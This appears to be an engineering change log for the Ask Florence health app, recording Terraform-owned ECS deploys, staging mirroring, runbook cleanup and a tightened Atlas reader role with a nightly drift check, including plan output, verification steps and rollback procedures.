Infrastructure Change Log

Purpose: Timestamped record of every meaningful infrastructure change. SOC 2 CC8.1 (Change Management) and CMS EDE Phase 3 change-control evidence.

Conventions:

  • Newest entries at the top.
  • Every entry: ISO-8601 UTC timestamp, actor, change summary, affected resources/accounts, linked issue/PR/commit, rollback note if applicable.
  • Cross-check against CloudTrail in the askflorence-log-archive account for the authoritative machine-readable record.

2026-05-13T10:30Z — ENG-277 PR 3: cleanup + ADR 0007 + deploy/rollback runbooks ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr3-cleanup, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (PR 3 of 3 — final).

What shipped

Deletions (3 files, ~600 lines retired):

  • .github/workflows/atlas-task-def-drift.yml — ENG-272 Layer 5 nightly drift checker. No longer needed with Terraform owning container_definitions end-to-end.
  • scripts/audit/atlas-task-def-drift.ts — the drift-checker script.
  • scripts/ops/patch-task-def-add-secret.sh — the manual remediation helper.

Doc updates:

  • scripts/audit/generate-access-matrix-docs.ts — "Four CI guards" → "Three CI guards"; references ADR 0007.
  • infra/atlas/access-matrix.ts — Layer 5 reference removed from CI-guard list.
  • docs/infrastructure/atlas-access-matrix.md — regenerated via npm run docs:atlas.
  • docs/.vitepress/config.ts — ADR + Runbooks sidebars extended.
  • docs/adr/index.md — 0007 added.

New docs:

  • docs/adr/0007-terraform-owns-ecs-task-def.md — Accepted ADR.
  • docs/runbooks/deploy-via-terraform.md — operational runbook.
  • docs/runbooks/rollback-via-terraform.md — rollback procedures.

Rollback

Pure revert. No live-state implications.


2026-05-13T10:00Z — ENG-277 PR 2: mirror Terraform-driven deploy to staging ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr2-staging, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (PR 2 of 3). Follows ENG-277 PR 1 prod ship (2026-05-13T02:23Z) which retired the silent-secret-binding-drift bug class on prod. PR 2 brings staging onto the same pipeline.

Why

Prod has been stable on the Terraform-driven pipeline since 2026-05-13T07:08Z (deploy run 25784042404 + multiple successful subsequent deploys). The same structural fix needs to land on staging so the ENG-279-shape drift cannot recur there either. Staging-side IAM was preemptively wired during the ENG-308 / ENG-309 / ENG-313 chain — both envs already have parity on AssumeRoleBackend + TerraformRefreshReadOnly + DeploySecretsRead + ValidateSecretsRole.

What shipped

Three files touched (mechanical mirror of PR 1):

  • .github/workflows/deploy-staging.yml — deleted the 2-step legacy chain (Download current task definition + Update task definition with new image) and the Deploy to ECS step. Inserted 5 new steps between the ensure-indexes block and the scale-to-1 step: hashicorp/setup-terraform@v3 (terraform_version 1.14.0), terraform init, terraform validate, terraform apply -auto-approve -var app_image_uri=<ecr-uri>, timeout 600 aws ecs wait services-stable. The 10-min cap mirrors the legacy wait-for-minutes: 10 semantics. Ensure-indexes block (lines 110-194 post-edit) untouched.
  • infra/envs/staging/ecs.tf — replaced hardcoded container_image = "public.ecr.aws/docker/library/nginx:alpine" with container_image = var.app_image_uri.
  • infra/envs/staging/variables.tf (NEW) — declares app_image_uri variable with the same nginx placeholder default as prod's variables.tf.

Pre-work probe

Captured against live staging state + current live image SHA. Diff verified clean:

# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 1 to change, 1 to destroy.

ECS task def "replace" is normal AWS provider behavior (immutable resource; registers new revision). No CloudFront / IAM / unrelated drift surfaced. Apply is expected to succeed end-to-end because staging IAM has parity with prod, and prod deploys on the same IAM shape have run cleanly since ENG-308.

Verification

PR-time CI:

  • terraform fmt -check -recursive infra/envs/ clean
  • npm run preflight -- --quick: all 4 checks expected to PASS

Post-merge:

  • Push main → staging branch fires deploy-staging.yml automatically
  • New workflow: build/push → ensure-indexes (legacy CLI path, unchanged) → Terraform init/validate/apply → aws ecs wait services-stable (10 min cap) → ALB smoke → post-deploy smoke 11/11 PASS
  • Live staging task def shows new revision, image SHA matches, secretCount = 16 (all bindings present including MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI which were the originally-drifted secrets on staging)
  • https://stage.askflorence.health/api/health returns 200

Rollback

Same shape as PR 1's rollback:

  • Apply fails: circuit breaker keeps service on old revision; git revert <PR2> + merge; investigate workflow log.
  • Apply succeeds but new task unhealthy: aws ecs update-service --cluster askflorence-staging --service askflorence-staging-app --task-definition askflorence-staging-app-task:<old-N>; wait stable; revert.
  • Bad image: re-push to staging branch with previous good SHA; same Terraform-owned pipeline rebuilds + applies known-good image. Fix forward.

2026-05-12T20:30Z — ENG-277 PR 1: drop lifecycle.ignore_changes = [container_definitions] on prod ECS task def; Terraform owns the whole task def via terraform apply -var app_image_uri=<sha> ​

Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-terraform-owns-task-def, PR against main); agent: Claude Opus 4.7 (1M context)

Linked: ENG-277 (Phase 2 / Option C structural fix); follow-up to ENG-272 (Layers 1-4, PR #150) and ENG-272 Layer 5 (PR #162); same bug class recurred 2026-05-11 (MONGODB_REFERENCE_URI) and 2026-05-12 (MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI on staging via ENG-279 PR #170). Prod-only change in PR 1. Staging stays on the legacy CI chain until PR 2 ships (24h after PR 1 deploy + soak — per the new universal prod-first deploy rule, staging is the YC demo link and cannot regress).

Why

The ECS app module pins lifecycle.ignore_changes = [container_definitions] so CI can register new task-def revisions on each deploy without Terraform fighting it. The block is all-or-nothing on the JSON-encoded container_definitions attribute — when Terraform source adds a new secrets[] or environment[] entry, Terraform silently stops tracking it, and the deploy workflow's describe-task-definition → render-task-definition chain only swaps the image. The new binding never lands on the running task.
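
The failure mode described above can be reproduced with a small model. This is a minimal sketch, not the deploy workflow's code: the ContainerDef shape is heavily simplified, MONGODB_URI and the ARN strings are made-up placeholders, and renderLegacy / renderFromSource are hypothetical names for the two strategies.

```typescript
// Hypothetical, simplified shapes; real ECS container definitions carry many more fields.
interface SecretBinding {
  name: string;
  valueFrom: string;
}

interface ContainerDef {
  image: string;
  secrets: SecretBinding[];
}

// Legacy chain: start from the LIVE definition and swap only the image.
// Bindings that exist only in Terraform source never reach the result.
function renderLegacy(live: ContainerDef, newImage: string): ContainerDef {
  return { ...live, image: newImage };
}

// Terraform-owned path: start from SOURCE, so every declared binding lands.
function renderFromSource(source: ContainerDef, newImage: string): ContainerDef {
  return { ...source, image: newImage };
}

// Names of secrets declared in source but absent from a rendered definition.
function missingSecrets(source: ContainerDef, rendered: ContainerDef): string[] {
  const present = new Set(rendered.secrets.map((s) => s.name));
  return source.secrets.map((s) => s.name).filter((n) => !present.has(n));
}

// Placeholder data: MONGODB_URI and the ARNs are illustrative only.
const liveDef: ContainerDef = {
  image: "app:old",
  secrets: [{ name: "MONGODB_URI", valueFrom: "arn:example:uri" }],
};
const sourceDef: ContainerDef = {
  image: "placeholder",
  secrets: [
    { name: "MONGODB_URI", valueFrom: "arn:example:uri" },
    { name: "MONGODB_WRITE_URI", valueFrom: "arn:example:write" },
  ],
};

console.log(missingSecrets(sourceDef, renderLegacy(liveDef, "app:new")));
console.log(missingSecrets(sourceDef, renderFromSource(sourceDef, "app:new")));
```

In this model the legacy path reports the new binding as missing on every deploy, while the source-driven path reports nothing missing, which is the structural difference ENG-277 relies on.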

Recurrences in the last ten days:

  • 2026-05-11 (ENG-272): MONGODB_REFERENCE_URI missing on staging → "Tyler Wood not covered" wrong on the YC application surface.
  • 2026-05-12 (ENG-279): MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI missing on staging task def revision 75 → POST /api/waitlist 500 on the YC link smoke; manual remediation via scripts/ops/patch-task-def-add-secret.sh registered revision 77.
  • ENG-249 + ENG-271 earlier (resume token, scheduler vars).

Pattern interval: ~24 hours. ENG-284 (PR #171) doubled down on detection (Phase-1 write-path smoke + 3 PR-time guards, including ecs-task-def-coverage). Detection layers do their jobs but can't prevent regressions that ship between checkpoints. ENG-277 retires the bug class by structural change: Terraform owns the task definition end-to-end, and the deploy workflow drives it via -var app_image_uri=<sha>.

What shipped (PR 1 — prod only) ​

Five files touched:

  • infra/modules/ecs-service/main.tf — deleted the lifecycle { ignore_changes = [container_definitions] } block on aws_ecs_task_definition.this. Shrank aws_ecs_service.this ignore_changes from [desired_count, task_definition] → [desired_count] (kept desired_count so the workflow's first-deploy 0→2 scaling step doesn't fight Terraform). Inline terraform fmt canonicalized pre-existing alignment in the locals { } block + the KmsDecryptForSecrets Sid (whitespace only, no semantic change).

  • infra/envs/prod/ecs.tf — replaced hardcoded container_image = "public.ecr.aws/docker/library/nginx:alpine" with container_image = var.app_image_uri. Comment block updated to explain Terraform now owns the image lifecycle.

  • infra/envs/prod/variables.tf (NEW) — declares variable "app_image_uri" with default = "public.ecr.aws/docker/library/nginx:alpine" (same placeholder; preserves no-arg terraform apply behavior for engineers modifying networking, KMS, etc.).

  • infra/envs/prod/github-oidc.tf — added Sid = "AssumeRoleBackend" statement granting sts:AssumeRole on arn:aws:iam::778477254880:role/TerraformBackendRole. This is the critical IAM gap the pre-work probe surfaced — the backend config in versions.tf declares assume_role { role_arn = "TerraformBackendRole" }, but the prod OIDC role's inline policy had direct S3/DDB/KMS perms on mgmt-account state resources WITHOUT the AssumeRole statement. Latent because the current deploy workflow doesn't run Terraform; surfaces immediately when PR 1 adds the Terraform apply step. Mirrored to staging in PR 2.

  • .github/workflows/deploy-prod.yml: deleted the 3-step legacy chain (Download current task definition, Update task definition with new image, Deploy to ECS). Inserted 5 new steps between the ensure-indexes block and the scale-to-2 step:

    1. hashicorp/setup-terraform@v3 pinned terraform_version: 1.14.0, terraform_wrapper: false
    2. terraform init -input=false in infra/envs/prod
    3. terraform validate
    4. terraform apply -auto-approve -input=false -var "app_image_uri=$IMAGE_URI" (where the GitHub Actions step references the build output via the standard steps.build-image.outputs.image-uri expression)
    5. timeout 900 aws ecs wait services-stable — mirrors the legacy wait-for-service-stability: true, wait-for-minutes: 15 behavior the removed amazon-ecs-deploy-task-definition step provided.

    The ensure-indexes pre-deploy block (lines 105-189 post-edit) is kept verbatim on the legacy register-task-definition + run-task CLI path; it still has its own lifecycle.ignore_changes = [container_definitions] in infra/modules/ecs-ensure-indexes/main.tf. It has a different blast radius (a one-shot pre-deploy task that exits non-zero on failure, aborting the deploy with the old service-tied task def still active) and is explicitly out of scope for ENG-277. It is tracked as a symmetric follow-up.

    The ENG-284 smoke expansion (lines 289-330 post-edit: Setup Node, Install smoke deps, Fetch smoke secrets, Post-deploy smoke) is preserved unchanged.

No staging changes in PR 1. .github/workflows/deploy-staging.yml, infra/envs/staging/ecs.tf, and the staging OIDC policy are untouched. Staging continues to use the legacy CI chain (describe-task-definition → render-task-definition → deploy-task-definition) until PR 2 ships after the 24h prod soak gate.

Pre-work terraform plan probe (local SSO, no commits, no apply)

Probe shape captured against live prod state with module changes applied locally and current live image SHA passed as -var. Confirmed the diff before opening PR 1.

# aws_iam_role_policy.github_actions_deploy will be updated in-place
# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 2 to change, 1 to destroy.
  • IAM policy update — adds the AssumeRoleBackend Sid.
  • ECS service update — task_definition ARN swaps from live :75 → (known after apply).
  • ECS task def "replace": normal AWS provider behavior for an immutable resource. Terraform registers a new revision (76+) with the new image AND the full Terraform-source content, then deregisters the state-tracked revision 1 (the bootstrap). Terraform does not touch live revisions 2-75, so they stay registered for rollback safety (the rollback to :75 below requires an ACTIVE revision, since ECS will not point a service at a deregistered one). Service deployment_circuit_breaker { enable = true, rollback = true } handles the rolling deployment with auto-rollback on health failure.
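
A later plan can be compared against the probe by parsing the summary line. The following is a rough sketch only: parsePlanSummary and matchesProbe are hypothetical helpers, and the regex covers just the add/change/destroy form shown above. Any other wording returns null and is treated as a mismatch.

```typescript
interface PlanSummary {
  add: number;
  change: number;
  destroy: number;
}

// Parses the human-readable summary line printed by `terraform plan`.
// Returns null when the line does not have the add/change/destroy shape.
function parsePlanSummary(line: string): PlanSummary | null {
  const m = /Plan: (\d+) to add, (\d+) to change, (\d+) to destroy\./.exec(line);
  if (!m) return null;
  return { add: Number(m[1]), change: Number(m[2]), destroy: Number(m[3]) };
}

// True only when the parsed summary equals the counts captured by the probe.
function matchesProbe(actual: PlanSummary | null, expected: PlanSummary): boolean {
  return (
    actual !== null &&
    actual.add === expected.add &&
    actual.change === expected.change &&
    actual.destroy === expected.destroy
  );
}

const probeSummary = parsePlanSummary("Plan: 1 to add, 2 to change, 1 to destroy.");
console.log(matchesProbe(probeSummary, { add: 1, change: 2, destroy: 1 }));
```

Scraping text output is brittle. The machine-readable plan from terraform show -json would be a sturdier input if this check were ever automated.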

Drift finding from the probe: MONGODB_AUDIT_WRITE_URI is declared in Terraform source (infra/envs/prod/ecs.tf) but was missing from live prod task def revision 75 — same shape as ENG-279's staging drift, but on prod (latent; no current code path reads it on prod, so no user-facing impact yet). PR 1's first apply silently fixes the drift by landing the binding on the new revision.

Verification gates

PR-time CI:

  • atlas-access-matrix-guard.yml — passes (no Mongo URI source changes).
  • ecs-task-def-coverage.yml (ENG-284) — passes (no secret bindings added/removed).
  • build-check.yml (ENG-284) — passes (no app code changes).
  • validate-secrets.yml — passes.

Post-merge prod deploy (via gh workflow run deploy-prod.yml --ref main):

  1. Build + push image to 039624954211.dkr.ecr.us-east-1.amazonaws.com/askflorence-app:<sha>.
  2. Ensure-indexes runs (legacy CLI path, unchanged).
  3. NEW: Setup Terraform 1.14.0 → terraform init (assumes TerraformBackendRole via the new OIDC Sid) → terraform validate → terraform apply -auto-approve -var app_image_uri=.... Apply registers task def revision 76 (or higher) with full source content; updates service task_definition to the new ARN.
  4. aws ecs wait services-stable --cluster askflorence-prod --services askflorence-prod-app returns within 15 min (typically 3-8 min for 2 tasks).
  5. ALB smoke against origin.askflorence.health/api/health — 200.
  6. npx tsx scripts/audit/post-deploy-smoke.ts — 11 checks (read-only 6 + ENG-284 write-path 5) PASS.
  7. Manual eyeball: aws ecs describe-task-definition --task-definition askflorence-prod-app-task --query 'taskDefinition.{revision:revision,image:containerDefinitions[0].image,envVarCount:length(containerDefinitions[0].environment),secretCount:length(containerDefinitions[0].secrets)}' — revision N+1, image SHA matches commit, env count matches Terraform source, secret count = 16 (was 15 live on revision 75; the addition is MONGODB_AUDIT_WRITE_URI).
  8. Full member + agent smoke flows against https://askflorence.health (CLAUDE.md procedures; synthetic emails taha+smoke-{plan-interest,agent}-2026-05-12-pr1prod@askflorence.health; cleanup against prod Atlas + HubSpot portal 246003491).
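
The manual eyeball in step 7 could be expressed as a small check over the JSON that the --query projection returns. This is a sketch under assumptions: checkTaskDef is a hypothetical helper, the image tag is assumed to end in :<sha> as in step 1, and the image URI, SHA, and env var count in the example are made up.

```typescript
// Shape of the JSON object produced by the --query projection in step 7.
interface TaskDefSummary {
  revision: number;
  image: string;
  envVarCount: number;
  secretCount: number;
}

// What the operator expects to see; every value is supplied by the caller.
interface ExpectedTaskDef {
  previousRevision: number;
  imageSha: string;
  envVarCount: number;
  secretCount: number;
}

// Returns a list of human-readable problems; an empty list means the check passed.
function checkTaskDef(actual: TaskDefSummary, want: ExpectedTaskDef): string[] {
  const problems: string[] = [];
  if (actual.revision <= want.previousRevision) {
    problems.push(`revision ${actual.revision} is not newer than ${want.previousRevision}`);
  }
  if (!actual.image.endsWith(`:${want.imageSha}`)) {
    problems.push(`image tag does not match ${want.imageSha}`);
  }
  if (actual.envVarCount !== want.envVarCount) {
    problems.push(`env var count ${actual.envVarCount}, expected ${want.envVarCount}`);
  }
  if (actual.secretCount !== want.secretCount) {
    problems.push(`secret count ${actual.secretCount}, expected ${want.secretCount}`);
  }
  return problems;
}

// Revision and secret counts follow the entry above; the image URI, SHA,
// and env var count are illustrative placeholders.
const exampleSummary: TaskDefSummary = {
  revision: 76,
  image: "registry.example/askflorence-app:abc1234",
  envVarCount: 10,
  secretCount: 16,
};
console.log(
  checkTaskDef(exampleSummary, { previousRevision: 75, imageSha: "abc1234", envVarCount: 10, secretCount: 16 }),
);
```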

Rollback

Three scenarios:

  • Apply fails mid-flight (e.g. IAM gap, plan diverges from probe): circuit breaker keeps service on revision 75; git revert <PR1 commit>; merge revert PR; investigate workflow log.
  • Apply succeeds but new task unhealthy (circuit breaker DIDN'T catch the issue): aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --task-definition askflorence-prod-app-task:75; wait stable; revert.
  • Bad image (build passes, runtime errors): re-dispatch deploy-prod.yml with ref = previous good SHA; same Terraform-owned pipeline rebuilds + applies a known-good image. Fix forward, no revert.

Soak gate

24h before PR 2 (staging) may merge. Monitor aws logs tail /aws/ecs/askflorence-prod-app --since 1h --format short at 1h / 4h / 12h / 24h. runningCount == desiredCount == 2 must hold. Hit /api/health and /api/eligibility hourly.
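
The checkpoint schedule and the gate condition can be written down as a tiny sketch. soakCheckpoints and soakGateOpen are hypothetical helpers, the deploy timestamp in the example is a placeholder, and the health endpoints are not modeled here.

```typescript
const MS_PER_HOUR = 60 * 60 * 1000;
const CHECKPOINT_HOURS = [1, 4, 12, 24];
const EXPECTED_TASKS = 2;

// Wall-clock times at which the soak should be inspected.
function soakCheckpoints(deployedAt: Date): Date[] {
  return CHECKPOINT_HOURS.map((h) => new Date(deployedAt.getTime() + h * MS_PER_HOUR));
}

interface ServiceCounts {
  runningCount: number;
  desiredCount: number;
}

// runningCount == desiredCount == 2 must hold for a sample to count as healthy.
function countsHealthy(c: ServiceCounts): boolean {
  return c.runningCount === c.desiredCount && c.desiredCount === EXPECTED_TASKS;
}

// The gate opens only after 24h have elapsed and every recorded sample was healthy.
function soakGateOpen(deployedAt: Date, now: Date, samples: ServiceCounts[]): boolean {
  const elapsedMs = now.getTime() - deployedAt.getTime();
  return elapsedMs >= 24 * MS_PER_HOUR && samples.length > 0 && samples.every(countsHealthy);
}

// Placeholder deploy time, not a real deploy from this log.
const exampleDeployAt = new Date("2026-01-01T00:00:00Z");
for (const checkpoint of soakCheckpoints(exampleDeployAt)) {
  console.log(checkpoint.toISOString());
}
```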

Out-of-scope follow-up

infra/modules/ecs-ensure-indexes/main.tf lines 179-181 still have lifecycle { ignore_changes = [container_definitions] }. Same bug class but different exposure (one-shot pre-deploy task with visible non-zero exit). Symmetric follow-up to file as a separate issue after PR 3 lands.


2026-05-11 — ENG-257 re-baseline: role_reader_reference 4-collection scope accepted as permanent (won't-fix) ​

Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/eager-dirac-acdd3e/ worktree (branch claude/eager-dirac-acdd3e, doc-hygiene PR against main); agent: Claude Sonnet 4.5

Linked: ENG-257 closed as not planned; GH #122 closed; GH #120 closeout comment cross-linked; ADR 0004 amendment 2026-05-11. No Atlas changes. No CI changes. No deploys.

Why

role_reader_reference was widened from 2 → 4 collections on 2026-05-09 to support the §1311 re-validation audit (ENG-230). ENG-257 was filed as the planned narrow-back once the audit cycle shipped. ENG-230 closed 2026-05-09. Re-examining the architecture on 2026-05-11: the wider scope is the role's actual permanent purpose, not a temporary tradeoff. All four collections are part of the §1311 / MRF reference dataset (same data classification, same network path); audit re-validation is a recurring responsibility (ENG-231 refresh cadence is open and will exercise the same access path). Narrow-then-re-widen on every future audit cycle is operational churn with zero posture benefit. Re-baseline the documentary framing to agree with the live role's responsibility.

What shipped

This is pure doc + comment hygiene. The Atlas role state, the matrix collections array, and every CI guard are unchanged. The only deltas are explanatory:

  • infra/atlas/access-matrix.ts — replaced the 7-line // TEMPORARY (added 2026-05-09 — narrow back ...) comment block above the plans + mrpuf_issuers_staging entries with a permanent justification comment.
  • src/lib/db.ts — same treatment on the parallel block in STAGING_REFERENCE_READ_COLLECTIONS.
  • docs/adr/0004-cross-cluster-atlas-privatelink.md — appended "Amendment 2026-05-11 (ENG-257 closeout)" section explaining the 4-collection canonical scope and why.
  • docs/runbooks/atlas-user-provisioning.md — updated Step B's atlas customDbRoles create role_reader_reference example to use the 4-collection canonical scope; updated the prose paragraph to reflect the role's two-purpose responsibility (runtime tier-fallback + audit re-validation).
  • docs/infrastructure/change-log.md — this entry.

Verification

  • npx tsc --noEmit — clean (no source changes other than a comment block).
  • npx tsx scripts/audit/access-matrix-env-coverage.ts — pass (no env-var bindings shifted).
  • npx tsx scripts/audit/access-matrix-doc-sync.ts — pass (doc cross-refs unchanged).
  • Nightly drift check (scripts/audit/staging-cluster-drift.ts) — already green since 2026-05-09 (matrix matches Atlas state); confirmed unchanged.
  • Post-merge smoke (/api/drugs/covered, /api/providers/covered) — runs on the existing Deploy prod workflow without modification; will pass because no live state changes.

Rollback

Comment-only PR has no live-system rollback. If a future cycle wants to re-narrow to 2 collections + provision a dedicated audit_reader user, the original recipe is preserved in GH #122's description and in this change-log's prior entry (2026-05-09T06:18Z).


2026-05-09T06:18Z — CI guard Phase 2 shipped (live nightly drift check) + cross-cluster reader role tightened to per-collection scoping ​

Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/practical-ride-fa5b6f/ worktree (branch claude/practical-ride-fa5b6f, will push to origin/ci-guard-phase-2); agent: Claude Opus 4.7 (1M context)

Linked: #100 / ENG-239 Phase 2 of 2 (Phase 1 is the 2026-05-09T04:18Z entry below); ADR 0004 Consequences section updated; brief at docs/briefs/overnight-ci-guard-phase-2.md. No deploys: this is a branch-only ship per brief constraints (cron-scheduled audit workflow, not PR-gated).

Why

Phase 1 (static guard, shipped 2026-05-08) catches code-level drift — every PR is rejected if it adds a getReferenceDb() call against a non-allow-listed collection. Phase 1 does NOT catch runtime drift: someone connecting to staging Atlas via mongosh and creating a PHI collection by hand; an out-of-band ingest writing a sensitive collection; a privilege expansion via Atlas Admin UI on the cross-cluster app_read_staging user. Phase 2 closes that gap by inspecting the actual Atlas state nightly and flagging drift as a P1 GitHub issue.

A pre-existing follow-up from the Phase 11 runbook (docs/runbooks/atlas-user-provisioning.md line 200) — "if a future audit requires per-collection scoping, replace this with a custom role role_reader_reference with FIND@askflorence.formularies_staging,FIND@askflorence.providers_staging" — was the natural way to give Phase 2's audit something specific to verify. Tightening + audit ship as one coherent unit.

What shipped

Atlas state changes (staging project 69e31af12fd2c0aef51bbb41):

  • Created custom role role_reader_reference with FIND action on askflorence.formularies_staging + askflorence.providers_staging ONLY. No other actions, no inheritedRoles.
  • Swapped app_read_staging user from built-in read@askflorence (whole-DB scope) → role_reader_reference@admin (per-collection scope). Atlas applied without restart; ~30s propagation.

Code (worktree branch claude/practical-ride-fa5b6f):

  • src/lib/db.ts — added STAGING_REFERENCE_READ_COLLECTIONS constant (formularies_staging + providers_staging). Distinct from STAGING_ALLOWED_COLLECTIONS (10 items, "what's allowed to live on the staging cluster"); STAGING_REFERENCE_READ_COLLECTIONS is "what the cross-cluster consumer actually reads." Two lists serve different security purposes.
  • scripts/audit/staging-cluster-drift.ts (NEW): TypeScript audit script wrapping the atlas CLI as a subprocess. No Atlas Admin API HTTP Digest re-implementation is needed: the atlas CLI handles auth via the MONGODB_ATLAS_PUBLIC_API_KEY + MONGODB_ATLAS_PRIVATE_API_KEY env vars in CI and falls back to the atlas auth login config locally. Validates 11 violation categories: user_missing / user_role_count / user_role_name / user_role_database / role_missing / role_inherited / role_action / role_resource_db / role_resource_cluster_scope / role_collection_extra / role_collection_missing. Exit 0 + ✅ PASS on canonical state; exit 1 + ❌ FAIL with per-violation report on drift. Defense-in-depth: locally duplicates the expected-collections set so a developer can't widen the contract by editing only db.ts.
  • .github/workflows/staging-cluster-drift.yml (NEW) — cron 0 8 * * * (08:00 UTC daily) + manual workflow_dispatch. Installs MongoDB Atlas CLI on the runner, binds ATLAS_DRIFT_CHECK_PUBLIC_KEY + ATLAS_DRIFT_CHECK_PRIVATE_KEY repo secrets to the canonical MONGODB_ATLAS_*_API_KEY env-var names atlas CLI consumes automatically, runs the script. On failure(): actions/github-script@v7 opens a P1 GitHub issue (labels compliance + priority-1) titled [Drift] Staging cluster role drift detected — YYYY-MM-DD linking to the workflow run + ADR 0004 + the runbook. permissions: { contents: read, issues: write }. Intentionally NOT triggered on PR/push — Phase 1 covers code-time drift; this is a separate axis (live cluster state).
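
To make the role-level categories concrete, here is a minimal sketch of how four of them could be derived from a role's privileges. It is not the shipped script: the flattened Privilege shape is an assumption (the atlas CLI's JSON nests actions and resources differently), and auditRole is a hypothetical name.

```typescript
// Hypothetical flattened view of one role privilege.
interface Privilege {
  action: string;
  db: string;
  collection: string;
}

interface Violation {
  category: string;
  detail: string;
}

// Duplicated locally on purpose, mirroring the defense-in-depth note above.
const EXPECTED_DB = "askflorence";
const EXPECTED_COLLECTIONS = ["formularies_staging", "providers_staging"];

function auditRole(privileges: Privilege[]): Violation[] {
  const violations: Violation[] = [];
  const covered = new Set<string>();
  for (const p of privileges) {
    const detail = `${p.action}@${p.db}.${p.collection}`;
    if (p.action !== "FIND") {
      violations.push({ category: "role_action", detail });
    }
    if (p.db !== EXPECTED_DB) {
      violations.push({ category: "role_resource_db", detail });
    } else if (!EXPECTED_COLLECTIONS.includes(p.collection)) {
      violations.push({ category: "role_collection_extra", detail });
    } else if (p.action === "FIND") {
      covered.add(p.collection);
    }
  }
  for (const c of EXPECTED_COLLECTIONS) {
    if (!covered.has(c)) {
      violations.push({ category: "role_collection_missing", detail: c });
    }
  }
  return violations;
}

const canonicalRole: Privilege[] = EXPECTED_COLLECTIONS.map((collection) => ({
  action: "FIND",
  db: EXPECTED_DB,
  collection,
}));

// A clean role yields no violations, so the exit code would be 0.
console.log(auditRole(canonicalRole).length === 0 ? "PASS" : "FAIL");
```

Appending FIND on an unexpected collection, or INSERT on an expected one, produces role_collection_extra and role_action respectively in this model.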

Documentation (5 files updated):

  • docs/runbooks/atlas-user-provisioning.md — Step B updated to provision the user with role_reader_reference@admin (instead of read@askflorence); rationale + emergency-rollback snippet added. New Step H — API key for nightly drift check (Phase 2): provisioning recipe, gh secret set commands, rotation cadence, drift-check rollback.
  • docs/security-compliance/soc2-control-mapping.md (then at docs/compliance/soc2/controls.md before the 2026-05-11 doc consolidation) — extended CC7.2 with new row for the live nightly check (verification + 3 synthetic violations); extended CC8.1 with new row for the role-tightening change-management posture.
  • docs/adr/0004-cross-cluster-atlas-privatelink.md — Consequences section restructured to mark both phases shipped + describe the audit posture.
  • docs/infrastructure/data-classification.md — Drift guard section restructured to mark Phase 2 shipped.
  • docs/decisions/2026-05-03-pivot-cms-api-direct.md — open-mitigations item rewritten to mark Phase 2 shipped.

No infrastructure changes (AWS, Terraform, ECS). No code paths in src/app/, src/components/, src/lib/ other than the new constant. No prod deploys. No Vercel deploys. No staging deploys. Branch-only ship per brief constraints; the audit workflow runs on cron (08:00 UTC daily) once the GH secrets are provisioned.

Verification

Pre-tighten baseline (apex + stage):

  • POST askflorence.health/api/drugs/covered {rxcuis:["1364441"], plan_id:"42261UT0060023", year:2026} → coverage=Covered, drug_tier=PreferredBrand, prior_authorization=false, quantity_limit=true, step_therapy=false. HTTP 200.
  • POST askflorence.health/api/providers/covered {npis:["1023023066"], plan_id:["42261UT0060023","42261UT0060026"], year:2026} → both coverage=Covered, network_tier=Preferred. HTTP 200.
  • POST stage.askflorence.health/api/drugs/covered (same body) → identical response. HTTP 200.
  • POST stage.askflorence.health/api/providers/covered (same body) → identical response. HTTP 200.

Post-tighten (60s after role swap): all 4 responses byte-identical to baseline. Cross-cluster path on prod still healthy with the narrower role; intra-cluster path on stage unaffected (uses mongodb/app-read user, not app_read_staging).
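
A byte-for-byte comparison like the one above can be sketched as a diff over captured response bodies. This is an illustration only: changedResponses is a hypothetical helper, the bodies are compared as raw text without re-serializing JSON, and the example body is a made-up fragment built from the field names listed in the baseline.

```typescript
// One captured response: a label for the request and the raw body text.
interface Capture {
  label: string;
  body: string;
}

// Returns the labels whose post-change body differs from the baseline.
// Raw string comparison means key order and whitespace differences count as changes,
// and a response missing from the second capture is reported as changed.
function changedResponses(baseline: Capture[], after: Capture[]): string[] {
  const afterByLabel = new Map<string, string>(
    after.map((c): [string, string] => [c.label, c.body]),
  );
  return baseline
    .filter((b) => afterByLabel.get(b.label) !== b.body)
    .map((b) => b.label);
}

// Illustrative body, not a real API response.
const exampleBody = '{"coverage":"Covered","drug_tier":"PreferredBrand"}';
const baselineCaptures: Capture[] = [
  { label: "apex drugs", body: exampleBody },
  { label: "stage drugs", body: exampleBody },
];

console.log(changedResponses(baselineCaptures, baselineCaptures));
```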

Drift script local run (via worktree's npx tsx scripts/audit/staging-cluster-drift.ts):

  • Canonical state: ✅ PASS, exit 0.
  • Synthetic violation A (extra collection — --append --privilege FIND@askflorence.agent_audit_log): ❌ FAIL, exit 1, category role_collection_extra flagging agent_audit_log. Reverted; clean state restored.
  • Synthetic violation B (wider action — --append --privilege INSERT@askflorence.formularies_staging): ❌ FAIL, exit 1, category role_action flagging INSERT. Reverted; clean state restored.
  • Synthetic violation C (extra role on user — --role role_reader_reference@admin --role read@admin): ❌ FAIL, exit 1, two categories — user_role_count (2 roles vs expected 1) + user_role_name (extra read@admin). Reverted; clean state restored.

Final state confirmation: drift script ✅ PASS; app_read_staging has exactly role_reader_reference@admin; role_reader_reference has exactly FIND@askflorence.formularies_staging + FIND@askflorence.providers_staging; final apex smoke (drugs + providers) returns canonical responses.

TypeScript: npx tsc --noEmit clean for files touched in this session (src/lib/db.ts + scripts/audit/staging-cluster-drift.ts); pre-existing unrelated errors in scripts/hubspot/* + src/lib/hubspot/* (missing @hubspot/api-client module typing) untouched and unaffected.

Compliance posture impact

| Framework | Control | Status |
| --- | --- | --- |
